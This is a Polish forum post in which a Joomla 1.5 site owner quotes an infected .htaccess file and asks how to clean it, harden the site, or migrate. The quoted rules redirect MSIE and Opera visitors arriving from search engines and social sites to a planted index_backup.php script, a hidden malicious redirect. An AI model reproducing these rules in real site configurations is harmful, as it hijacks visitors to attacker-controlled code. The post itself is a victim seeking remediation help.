w tym temacie bo sprwa dotyczy pliku htaccess mianowicie zauważyłem że obecnie plik wygląda tak:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|yandex|ya|baidu|youtube|wikip edia|qq|excite|altavista|msn|netscape|aol|hotbot|g oto|infoseek|mamma|alltheweb|lycos|search|metacraw ler|bing|dogpile|facebook|twitter|blog|live|myspac e|linkedin|flickr|filesearch|yell|openstat|metabot |gigablast|entireweb|amfibi|dmoz|yippy|walhello|we bcrawler|jayde|findwhat|teoma|euroseek|wisenut|abo ut|thunderstone|ixquick|terra|lookle|metaeureka|se archspot|slider|topseven|allthesites|libero|clicke y|galaxy|brainysearch|pocketflier|verygoodsearch|b ellnet|freenet|fireball|flemiro|suchbot|acoon|deva ro|fastbot|netzindex|abacho|allesklar|suchnase|sch nellsuche|sharelook|sucharchiv|suchbiene|suchmasch ine|infospace|web|websuche|witch|wolong|oekoportal |freenet|arcor|alexana|tiscali|kataweb|voila|sfr|s tartpagina|kpnvandaag|ilse|wanadoo|telfort|hispavi sta|passagen|spray|eniro|telia|bluewin|sympatico|n lsearch|atsearch|klammeraffe|sharelook|suchknecht| ebay|abizdirectory|alltheuk|bhanvad|daffodil|click 4choice|exalead|findelio|gasta|gimpsy|globalsearch directory|hotfrog|jobrapido|kingdomseek|mojeek|sea rchers|simplyhired|splut|thisisouryear|ukkey|uwe|f riendsreunited|jaan|qp|rtl|apollo7|bricabrac|findl oo|kobala|limier|express|bestireland|browseireland |finditireland|iesearch|kompass|startsiden|confex| finnalle|gulesider|keyweb|finnfirma|kvasir|savio|s ol|startsiden|allpages|america|botw|chapu|claymont |clickz|clush|ehow|findhow|icq|westaustraliaonline )\.(.*)
RewriteCond %{HTTP_USER_AGENT} ^.*(msie|opera) [NC]
RewriteCond %{REQUEST_FILENAME} !/index_backup.php
RewriteRule (.*) /index_backup.php?query=$1 [QSA,L]
</IfModule>
Udało mi sie już doczytać że strona został zainfekowana pousuwałem już plik index_backup.php oraz inne podejrzane. teraz Chiałbym wyczyscić lub napisać poprawnie kod w pliku htaccess gdzie mógłbym znaleźć taki gotowy, kóry pasłowałby do strony - system jommla 1,5 czy wystarczyłoby abym podmienił ten plik z katalogu głownego i zamienił z txt. Czy mógłbym jednak znaleść taki kod źródłowy, kóry zabezpieczył by stronę, przed podobnymi atakami? czy ogólnie zapomnieć o sprawie ( bo ataki będą sie powtarzać) i starać się zrobić migrację do nowszej wersji joomli.